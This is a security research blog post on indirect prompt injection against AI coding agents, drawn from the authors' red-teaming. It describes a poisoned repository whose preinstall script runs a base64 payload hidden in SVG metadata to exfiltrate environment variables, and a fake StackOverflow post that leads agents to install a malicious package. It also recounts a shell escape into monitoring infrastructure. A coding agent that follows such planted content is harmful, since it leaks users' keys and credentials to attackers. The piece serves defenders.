ResearchJanuary 13, 20265 min read

The Threat Model for Coding Agents is Backwards

Most people think about AI security wrong. They imagine a user trying to jailbreak the model. With coding agents, the user is the victim, not the attacker.

Ismail PelaseyedCo-founder & CTO of Superagent.sh
Share:

Most people think about AI security wrong. They imagine a user trying to jailbreak the model. Get it to say something bad. Bypass the guardrails.

That's not the real threat with coding agents.

With coding agents, the user is the victim, not the attacker. Users already have legitimate access to everything the agent can do. The real threat comes from malicious content injected through external sources that the agent consumes during normal operation.

This is indirect prompt injection. And coding agents are uniquely vulnerable to it.

Why coding agents are different

A chatbot reads your messages and responds. The attack surface is basically the input box.

A coding agent reads your messages, clones repositories, searches the web, installs packages, reads documentation, executes shell commands, writes files, and deploys applications. Every single one of those is an injection point.

We've red teamed some of the most popular coding agent platforms on the market. The pattern is consistent. The vulnerabilities aren't in the chat interface. They're in everything the agent touches.

Repository poisoning in action

Users clone repos all the time. "Set this up for me." "Follow the README." Totally normal workflow.

But if an attacker controls the repository, they control what the agent reads. Here's what a real attack looks like:

my-awesome-starter/
  README.md
  package.json
  scripts/
    assets.js        <-- looks like build tooling
  assets/
    logo.svg         <-- payload hidden in metadata
  src/
    index.js

The package.json runs an "asset validation" script on install:

{
  "scripts": {
    "preinstall": "node scripts/assets.js"
  }
}

The script looks completely legitimate. Professional comments, proper error handling, references to "CDN optimization" and "licensing compliance." But buried in there is code that extracts base64 payloads from SVG metadata and executes them.

And logo.svg is just a simple circle. Except in the metadata:

<verify:config xmlns:verify="https://legit-looking-domain.com/schema">
  IyEvYmluL3NoCm5vZGUgLWUgImNvbnN0IGRucz1yZXF1aXJl...
</verify:config>

That base64 blob exfiltrates environment variables via DNS. The "asset validation" script extracts and executes it. Every API key gets sent to an attacker. The agent sees professional-looking build tooling and never flags it.

Package manipulation is social engineering for AI

Here's one that surprised us. Agents are generally cautious about installing random packages. They've been trained to be skeptical.

But they trust authority.

We created a fake StackOverflow post. Professional formatting, upvotes, accepted answer checkmark, a user called "SecurityGuru" with 3.2k reputation. The answer recommends installing a malicious package for "modern security threats."

Fake StackOverflow post recommending malicious package

Share that screenshot with a coding agent. Ask it to implement the solution. The agent follows the advice from the "trusted" source. The package has a postinstall script that exfiltrates your git config, environment variables, and anything else it can reach.

This is social engineering, but the target is the AI. It's not trying to trick the user. It's trying to trick the agent into trusting a source that looks legitimate.

Infrastructure access compounds everything

Coding agents run with broad permissions. In one assessment, the default database user was a superuser. From there we escaped to a shell, then reached internal monitoring infrastructure with no authentication.

A malicious README could compromise monitoring systems. That's the blast radius we're talking about.

Whose problem is this?

Here's the uncomfortable question nobody wants to answer: who's responsible for securing this?

The people using coding agents often don't know. The rise of "vibe coding" means more people are building software without traditional engineering backgrounds. They're not thinking about postinstall hooks or SVG metadata attacks. They're asking the agent to set up a repo and trusting that it works.

Is it the coding agent platform's responsibility? They're the ones giving the agent shell access and network permissions. They could scan repositories before importing. They could sandbox package installations. They could flag suspicious lifecycle scripts. Most don't.

Is it GitHub's responsibility? They host the malicious repos. But they also host millions of legitimate repos and can't manually review every package.json.

Is it npm's responsibility? Malicious packages are a known problem. They do some scanning, but postinstall scripts that look legitimate slip through constantly.

The honest answer is that everyone is pointing at everyone else. The coding agent platforms assume the package registries are safe. The package registries assume developers know what they're installing. The developers assume the AI knows what it's doing.

Meanwhile, the attack surface keeps growing.

The uncomfortable reality

Jailbreaking matters. But for coding agents, indirect prompt injection through repositories, packages, and external content is the bigger risk. The attacker is trying to use the agent to attack the user.

If you're deploying coding agents, ask: What external content does this agent consume? What can an attacker control? What's the blast radius if the agent follows malicious instructions?

And if you're building coding agent platforms: this is your problem. Your users don't know about these risks. They're trusting you to handle it. Right now, most platforms aren't.

Join our newsletter

We'll share announcements and content regarding AI safety.